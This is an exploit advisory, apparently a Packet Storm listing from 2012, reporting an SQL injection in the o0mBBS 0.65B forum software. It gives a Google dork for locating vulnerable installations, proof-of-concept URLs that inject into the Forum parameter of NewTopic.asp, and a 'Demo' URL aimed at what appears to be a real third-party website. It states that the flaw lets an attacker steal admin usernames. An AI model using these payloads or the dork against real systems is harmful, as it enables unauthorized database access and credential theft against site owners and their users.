o0mBBS 0.65B SQL Injection

2012-06-12T00:00:00
ID PACKETSTORM:113548
Type packetstorm
Reporter L3b-r1'z
Modified 2012-06-12T00:00:00

Description

                                        
                                            `# --------------------------------------- #  
Author : L3b-r1'z  
Title : o0mBBS Sql Injection  
Date : 6/12/2012  
Email : L3br1z@Gmail.com  
Site : Sec4Ever.com & Exploit4arab.com  
Google Dork : allintext: "o0mBBS version 0.65B"  
Version : 0.65  
# --------------------------------------- #  
1) Bug  
2) PoC  
# --------------------------------------- #  
2) Bug :  
Attacker Can Injection Database And Steal The Username And Admin.  
# --------------------------------------- #  
3) PoC :  
  
http://localhost/o0m/NewTopic.asp?Type=NewTopic&Forum=[SQL]  
http://localhost/o0m/NewTopic.asp?Type=NewTopic&Forum=2'  
  
Demo :  
  
http://www.oasitech.it/o0m/NewTopic.asp?Type=NewTopic&Forum=2%27  
# --------------------------------------- #  
Thx To : I-Hmx , B0X , Hacker-1420 , Damane2011 , Sec4ever , The Injector ,  
Over-X , Ked-Ans , N4SS1M , B07 M4ST3R , Black-ID , Abu Hamid Madridi.  
# --------------------------------------- #  
`